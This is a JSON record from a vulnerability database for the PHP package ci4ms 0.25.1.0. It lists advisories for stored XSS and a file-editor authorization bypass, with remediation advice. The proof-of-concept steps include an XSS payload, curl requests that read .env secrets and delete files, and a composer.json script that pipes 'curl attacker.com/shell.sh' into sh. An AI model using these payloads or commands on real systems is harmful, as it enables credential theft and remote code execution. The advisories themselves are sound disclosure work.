Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/955317?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/955317?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.25.1.0", "type": "composer", "namespace": "ci4-cms-erp", "name": "ci4ms", "version": "0.25.1.0", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "0.31.8.0", "latest_non_vulnerable_version": "0.31.8.0", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89558?format=api", "vulnerability_id": "VCID-12hw-23dd-9ud8", "summary": "CI4MS: Methods Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary \n### **Vulnerability: Stored DOM XSS via Methods Management Fields (Global Persistent Payload Execution)** \n- Stored Cross-Site Scripting via Unsanitized Method Creation and Management Inputs \n- Automatic Execution Across All Pages Where Method Is Rendered in Navigation \n\n## Description \nThe application fails to properly sanitize user-controlled input within the **Methods Management** functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding.\n\nThese stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in **Stored DOM-Based Cross-Site Scripting (XSS)**.\n\nCritically, because created methods are automatically rendered inside the system’s navigation/menu structure, the injected payload executes globally — meaning **every page visited where the malicious method appears in the menu triggers the XSS payload automatically**.\n\nThis significantly increases severity, as exploitation is not limited to a single view — it becomes a platform-wide persistent execution point.\n\n## Affected Functionality \n- Methods creation functionality \n- Methods management and listing functionality \n- Administrative navigation rendering \n- Permission-related UI rendering \n- Global sidebar / menu rendering \n- Storage and retrieval of method-related data \n\n## Affected Fields \nThe following fields accept unsanitized input and allow persistent JavaScript injection:\n- Page Name \n- Description \n- Controller \n- Method Name \n- Seflink \n- Page Order \n- Symbol (FontAwesome 5) \n- Permissions \n- Parent Page \n- Module \n\n## Attack Scenario \n1. An attacker creates or edits a method.\n2. The attacker injects a malicious XSS payload into any vulnerable field (e.g., Page Name).\n3. The application stores the payload without sanitization or encoding.\n4. The method is automatically rendered inside the application’s navigation/menu.\n5. Every time any user visits any page where the menu is displayed, the malicious JavaScript executes automatically.\n\nBecause the navigation is globally rendered across backend pages, the XSS triggers on nearly every administrative page visit.\n\n## Impact \n- Persistent Stored DOM XSS \n- Automatic execution across multiple application pages \n- Execution of arbitrary JavaScript in victims’ browsers \n- Privilege escalation when viewed by administrators \n- Full administrator account takeover \n- Full account takeover across all roles \n- Session hijacking \n- CSRF token theft \n- Complete compromise of the entire application \n\nThis vulnerability is highly severe due to:\n- Persistent storage \n- Global rendering surface \n- Automatic execution without user interaction \n- High likelihood of administrator exposure \n\nEndpoints:\n- `/backend/methods/` \n- `/backend/methods/create` \n\n## Steps To Reproduce (POC) \n1. Navigate to Methods Management → Create Method \n2. Insert the following payload into Page Name (or any vulnerable field): \n`<img src=x onerror=alert(document.domain)>` \n3. Save the method \n4. Navigate to any backend page \n5. Observe the payload executing automatically wherever the malicious method appears in the menu \n6. The XSS triggers across all pages where the navigation is rendered.\n\n## Remediation \n- Never use `.html()`, `innerHTML`, or equivalent unsafe DOM sinks with untrusted data \n- Implement strict output encoding (HTML entity encoding) before rendering user input \n- Apply server-side input validation and sanitization \n- Use contextual escaping depending on rendering context (HTML, attribute, JS, URL) \n- Implement a strong Content Security Policy (CSP) \n- Set cookies with HttpOnly, Secure, and SameSite flags \n- Perform security review of all navigation rendering logic \n\nFailure to properly encode and sanitize user-controlled method fields results in full application compromise through persistent global XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/CFsiQAJS#cBSF2lCMD7YNZEKYEjw3T8YturY92oBvrdRQ08gmw2A", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34558", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.06184", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07262", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07305", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07329", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34558" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v77r-xg3p-75g7", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:25:04Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v77r-xg3p-75g7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34558", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34558" }, { "reference_url": "https://github.com/advisories/GHSA-v77r-xg3p-75g7", "reference_id": "GHSA-v77r-xg3p-75g7", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v77r-xg3p-75g7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34558", "GHSA-v77r-xg3p-75g7" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-12hw-23dd-9ud8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89038?format=api", "vulnerability_id": "VCID-2kn3-qswm-p3ck", "summary": "CI4MS: Blogs Posts Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Blog Post Content (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Blog Post Content in Blog Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when creating or editing blog posts. An attacker can inject a malicious JavaScript payload into blog post content, which is then stored server-side.\n\nThis stored payload is later rendered unsafely in multiple application views without proper output encoding, leading to stored cross-site scripting (XSS).\n\n### Affected Functionality\n- Blog post creation functionality\n- Blog post editing functionality\n- Blog post storage and retrieval logic\n\n### Attack Scenario\n- An attacker creates or edits a blog post to include a malicious XSS payload.\n- The application stores this content without sanitization or encoding.\n- The payload persists and executes whenever the blog post is rendered in affected views.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/blogs/create`\n- `/backend/blogs/`\n- `/blog/{id}`\n\n## Steps To Reproduce (POC)\n1. Go to the Blog Post Create or Edit page\n2. Insert an XSS payload into the blog post content such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save or publish the blog post\n4. View the post via the administrative panel or public blog page\n5. Notice the XSS payload executing automatically\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\n https://mega.nz/file/bYtCQRqT#ph1S_01XaYXiNTzanP3AVL6aQMe0YC5Py7Gko1FoT4A", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34568", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05058", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05035", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05043", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.06082", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34568" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:51:46Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x7wh-g25g-53vg", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:51:46Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-x7wh-g25g-53vg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34568", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34568" }, { "reference_url": "https://github.com/advisories/GHSA-x7wh-g25g-53vg", "reference_id": "GHSA-x7wh-g25g-53vg", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x7wh-g25g-53vg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34568", "GHSA-x7wh-g25g-53vg" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2kn3-qswm-p3ck" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89782?format=api", "vulnerability_id": "VCID-2v9s-x9dt-8ugb", "summary": "CI4MS has a Hidden Items Authorization Bypass in Fileeditor Allows Reading Secrets and Writing Protected Files\n## Summary\n\nThe Fileeditor controller defines a `hiddenItems` array containing security-sensitive paths (`.env`, `composer.json`, `vendor/`, `.git/`) but only enforces this protection in the `listFiles()` method. The `readFile()`, `saveFile()`, `deleteFileOrFolder()`, `renameFile()`, `createFile()`, and `createFolder()` endpoints perform no hidden items validation, allowing direct API access to files that are intended to be protected. A backend user with only `fileeditor.read` permission can exfiltrate application secrets from `.env`, and a user with `fileeditor.update` permission can overwrite `composer.json` to achieve remote code execution.\n\n## Details\n\nThe `hiddenItems` array is defined at `modules/Fileeditor/Controllers/Fileeditor.php:10-26`:\n\n```php\nprotected $hiddenItems = [\n '.git', '.github', '.idea', '.vscode',\n 'node_modules', 'vendor', 'writable',\n '.env', 'env', 'composer.json', 'composer.lock',\n 'tests', 'spark', 'phpunit.xml.dist', 'preload.php'\n];\n```\n\nThis array is checked **only** in `listFiles()` at lines 45-48 and 64:\n\n```php\n// Line 45-48 - path component check\nforeach ($pathParts as $part) {\n if (in_array($part, $this->hiddenItems)) {\n return $this->failForbidden();\n }\n}\n// Line 64 - directory listing filter\nif (in_array($name, $this->hiddenItems)) continue;\n```\n\nHowever, `readFile()` (line 76) performs **neither** a `hiddenItems` check **nor** an `allowedFileTypes()` check:\n\n```php\npublic function readFile()\n{\n // ... validation ...\n $path = $this->request->getVar('path');\n $fullPath = realpath(ROOTPATH . $path);\n if (!$fullPath || !is_file($fullPath) || strpos($fullPath, realpath(ROOTPATH)) !== 0) {\n return $this->response->setJSON(['error' => '...'])->setStatusCode(400);\n }\n return $this->response->setJSON(['content' => file_get_contents($fullPath)]);\n}\n```\n\nThis means any file within ROOTPATH — regardless of extension (`.php`, `.env`, etc.) — can be read by any user with the `fileeditor.read` permission.\n\nSimilarly, `saveFile()` (line 92) checks `allowedFileTypes()` but not `hiddenItems`. Since `json` is in `$allowedExtensions`, `composer.json` (which is explicitly in `hiddenItems`) can be overwritten:\n\n```php\nprotected $allowedExtensions = ['css', 'js', 'html', 'txt', 'json', 'sql', 'md'];\n```\n\n`deleteFileOrFolder()` (line 194) checks neither `hiddenItems` nor `allowedFileTypes()`.\n\n**Compounding factor:** CSRF protection is disabled for all fileeditor routes in `modules/Fileeditor/Config/FileeditorConfig.php:7-10`:\n\n```php\npublic $csrfExcept = [\n 'backend/fileeditor',\n 'backend/fileeditor/*',\n];\n```\n\nThis means the write and delete operations are additionally vulnerable to cross-site request forgery if an authenticated user visits a malicious page.\n\n## PoC\n\nRequires an authenticated backend session with `fileeditor.read` permission granted.\n\n**Step 1: Read .env file to extract secrets**\n```bash\ncurl -s -b 'ci_session=<valid_session_cookie>' \\\n 'https://target.com/backend/fileeditor/read?path=/.env'\n```\nExpected response: JSON containing `.env` file contents including database credentials, encryption keys, and other secrets.\n\n**Step 2: Read PHP configuration files**\n```bash\ncurl -s -b 'ci_session=<valid_session_cookie>' \\\n 'https://target.com/backend/fileeditor/read?path=/app/Config/Database.php'\n```\nExpected response: Full database configuration PHP source with credentials (note: `readFile()` has no `allowedFileTypes` check, so `.php` files are readable).\n\n**Step 3: Overwrite composer.json for RCE (requires `fileeditor.update` permission)**\n```bash\ncurl -s -b 'ci_session=<valid_session_cookie>' \\\n -X POST 'https://target.com/backend/fileeditor/save' \\\n -d 'path=/composer.json' \\\n -d 'content={\"scripts\":{\"post-install-cmd\":\"curl attacker.com/shell.sh|sh\"}}'\n```\nThe next `composer install` or `composer update` executes the attacker's script.\n\n**Step 4: Delete .env (requires `fileeditor.delete` permission)**\n```bash\ncurl -s -b 'ci_session=<valid_session_cookie>' \\\n -X POST 'https://target.com/backend/fileeditor/deleteFileOrFolder' \\\n -d 'path=/.env'\n```\n\n## Impact\n\n- **Credential disclosure:** Any backend user with `fileeditor.read` permission can read `.env` (database passwords, encryption keys, API secrets, mail credentials) and any PHP configuration file regardless of extension restrictions.\n- **Remote code execution:** A user with `fileeditor.update` permission can overwrite `composer.json` with malicious composer scripts that execute on the next `composer install/update`.\n- **Denial of service:** A user with `fileeditor.delete` permission can delete `.env` or other critical configuration files, causing application failure.\n- **False security boundary:** Administrators who configure `fileeditor.read` as a limited permission for content editors are unknowingly granting access to all application secrets, since the `hiddenItems` protection only affects the UI file tree, not the API.\n\n## Recommended Fix\n\nApply `hiddenItems` validation to all endpoints that accept a `path` parameter. Extract the check into a reusable method and also add `allowedFileTypes` to `readFile()`:\n\n```php\n// Add this method to the Fileeditor controller\nprivate function isHiddenPath(string $path): bool\n{\n $pathParts = explode('/', trim($path, '/'));\n foreach ($pathParts as $part) {\n if (in_array($part, $this->hiddenItems)) {\n return true;\n }\n }\n return false;\n}\n\n// Then add to readFile(), saveFile(), renameFile(), createFile(), \n// createFolder(), and deleteFileOrFolder():\nif ($this->isHiddenPath($path)) {\n return $this->failForbidden();\n}\n\n// Additionally, add allowedFileTypes check to readFile():\nif (!$this->allowedFileTypes($fullPath)) {\n return $this->failForbidden();\n}\n```\n\nAlso re-enable CSRF protection by removing the CSRF exemption in `FileeditorConfig.php` (lines 7-10) and ensuring the frontend sends CSRF tokens with requests.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39389", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07363", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07406", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07429", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07422", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39389" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-9rxp-f27p-wv3h", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T20:28:40Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-9rxp-f27p-wv3h" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39389", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39389" }, { "reference_url": "https://github.com/advisories/GHSA-9rxp-f27p-wv3h", "reference_id": "GHSA-9rxp-f27p-wv3h", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9rxp-f27p-wv3h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-cd9w-5f22-xkfk" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0" } ], "aliases": [ "CVE-2026-39389", "GHSA-9rxp-f27p-wv3h" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2v9s-x9dt-8ugb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89551?format=api", "vulnerability_id": "VCID-4qss-f4ym-bbeh", "summary": "CI4MS: Logs Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM Blind XSS via Logs Interface Rendering (Administrative Context Execution)**\n- Stored Cross-Site Scripting (Blind XSS) via Unsafe Rendering of User-Controlled Logged Data\n\n### Description\nThe application renders user-controlled input unsafely within the logs interface. If any stored XSS payload exists within logged data, it is rendered without proper output encoding.\n\nThis issue becomes a Blind XSS scenario because the attacker does not see immediate execution. Instead, the payload is stored within application logs and only executes later when an administrator views the logs page.\n\nFor example, accessing `/backend/backup/restore/xss-payload-here` causes an error that gets logged by the application. If the injected portion contains an XSS payload, it is stored inside the logs without sanitization and later rendered unsafely inside the logs management interface.\n\nWhen an administrator views the logs page, the stored payload executes automatically in the administrative browser context, leading to stored blind cross-site scripting (Blind XSS).\n\n### Affected Functionality\n- Application logging mechanism\n- Logs storage and retrieval logic\n- Logs rendering within administrative interface\n- Any endpoint that logs unsanitized user-controlled input\n\n### Attack Scenario\n- An attacker injects a malicious XSS payload into any user-controlled input that is logged by the application.\n- Example: Visit `/backend/backup/restore/<img src=x onerror=alert(document.domain)>`\n- The application throws an error and logs the malicious payload.\n- The payload is stored within application logs.\n- An administrator views the logs interface.\n- The payload executes automatically in the administrator’s browser context.\n\nAny method or endpoint that logs user-controlled input without sanitization will result in the same Blind XSS condition when viewed inside logs management.\n\n### Impact\n- Persistent Stored Blind XSS\n- Execution of arbitrary JavaScript in administrators’ browsers\n- Privilege escalation when viewed by administrators\n- Full administrator account takeover\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/logs/`\n- `/backend/backup/restore/{payload}`\n- Any other endpoint that logs xss payloads there\n\n## Steps To Reproduce (POC)\n1. Trigger an endpoint that logs user-controlled input, such as:\n `/backend/backup/restore/<img src=x onerror=alert(document.domain)>`\n2. Ensure the request generates an error and the payload is written into application logs\n3. Navigate to the logs interface as an administrator\n4. View the logged entry\n5. Notice the XSS payload executing automatically (Blind XSS)\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n# Ready Video POC:\nhttps://mega.nz/file/jRN3nDSR#wJCwyFhbeT-OYAwlaTD_7j6wc5wRgz1EGJL0bnuhHxY", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34560", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.06563", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.06551", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00022", "scoring_system": "epss", "scoring_elements": "0.06562", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07704", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34560" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:58:43Z/" } ], "url": 